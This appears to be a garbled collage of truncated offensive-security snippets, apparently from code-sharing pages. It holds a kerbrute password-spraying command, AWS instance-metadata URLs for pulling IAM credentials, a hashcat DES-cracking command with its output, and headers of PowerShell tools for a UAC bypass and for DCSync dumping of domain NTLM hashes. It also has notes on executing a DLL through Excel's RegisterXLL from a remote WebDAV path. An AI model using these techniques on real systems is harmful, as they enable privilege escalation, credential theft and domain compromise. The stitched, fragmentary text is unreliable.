https://www.youtube.com/playlist?list=PLKK11Ligqitg9MOX3-0tFT1Rmh3uJp7kA
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
import os | |
import sys | |
import time | |
import struct | |
import select | |
import binascii | |
import bluetooth | |
from bluetooth import _bluetooth as bt |
# Powershell script to bypass UAC on Vista+ assuming | |
# there exists one elevated process on the same desktop. | |
# Technical details in: | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html | |
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html | |
# You need to Install-Module NtObjectManager for this to run. | |
Import-Module NtObjectManager |
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\
.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
hashcat64.exe -m 14000 hashes.txt -o cracked.txt -a 3 -1 charsets/DES_full.charset --hex-charset ?1?1?1?1?1?1?1?1 -w 3 | |
- Device #1: GeForce GTX 1080, 2048/8192 MB allocatable, 20MCU | |
Session.Name...: hashcat | |
Status.........: Running | |
Input.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8] | |
Custom.Chars...: -1 charsets/DES_full.charset, -2 Undefined, -3 Undefined, -4 Undefined | |
Hash.Target....: File (des_test.txt) | |
Hash.Type......: DES (PT = $salt, key = $pass) |
function Invoke-UACBypass { | |
<# | |
.SYNOPSIS | |
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Improved by: @harmj0y |
# useful for running ssl server on localhost | |
# which in turn is useful for working with WebSocket Secure (wss) | |
# copied from http://www.piware.de/2011/01/creating-an-https-server-in-python/ |